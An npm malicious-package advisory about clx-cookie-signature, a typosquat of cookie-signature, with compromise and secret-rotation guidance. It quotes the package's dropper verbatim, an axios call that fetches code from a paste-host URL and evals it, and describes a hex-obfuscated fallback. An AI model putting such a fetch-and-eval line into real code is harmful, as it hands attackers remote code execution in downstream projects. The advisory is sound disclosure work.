npm · Malicious package advisory
Malwareclx-cookie-signature
MAL-2026-6141
Malicious code in clx-cookie-signature (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9e0e91601d276764067b1b209efd17a1f59ef03ff4fc814bcb22c495f4a0f9b3)
Package impersonates the popular cookie-signature library (copying its README, author field 'TJ Holowaychuk <tj@learnboost.com>', and sign/unsign API), but index.js adds a top-level dropper that fires the moment the module is required. Specifically, index.js line 16 issues `require('axios').get('https://www.jsonkeeper.com/b/MYUKZ').then(r => { eval(r.data.content_o); })`, eval'ing whatever JSON the author currently hosts at that URL. A helper `g()` (index.js lines 18-24) decodes hex-encoded strings to reconstruct the tokens 'axios', 'get', 'then' and a second payload URL https://www.jsonkeeper.com/b/HY6M6, providing an obfuscated fallback dropper. Because jsonkeeper.com is a mutable, author-controlled paste host, the author can change the executed code at any time without republishing the package. Any project that installs and require()s clx-cookie-signature — likely as a mistyped substitute for cookie-signature — runs arbitrary attacker code in the consuming process.
## Source: ghsa-malware (b6f8bcf9ace189d38ea749fd2cf087f05e80dbb540c2c7b3bb0466e30a269008)
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Compromised versions (1)
- 1.2.1
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.